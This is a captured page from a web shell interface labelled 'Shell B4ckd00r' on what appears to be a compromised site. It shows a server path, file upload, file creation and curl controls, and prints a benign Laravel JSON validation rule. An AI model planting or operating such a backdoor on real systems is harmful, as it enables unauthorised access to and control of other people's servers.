Shell B4ckd00r
Current Dir :
/
home
/
u789730693
/
domains
/
piorasplash.com
/
public_html
/
app
/
Rules
/
Home
Upload
Create Dir
Create File
Curl
Current File : /home/u789730693/domains/piorasplash.com/public_html/app/Rules/ValidJsonOrder.php
<?php namespace App\Rules; use Illuminate\Contracts\Validation\Rule; class ValidJsonOrder implements Rule { public $message = ''; /** * Create a new rule instance. * * @return void */ public function __construct() { } /** * Determine if the validation rule passes. * * @param string $attribute * @param mixed $value * @return bool */ public function passes($attribute, $value): bool { $requestItems = json_decode($value); if (count($requestItems) == 0) { $this->message = 'This :attribute must be json.'; return false; } return true; } /** * Get the validation error message. * * @return string */ public function message(): string { return $this->message; } }
v.01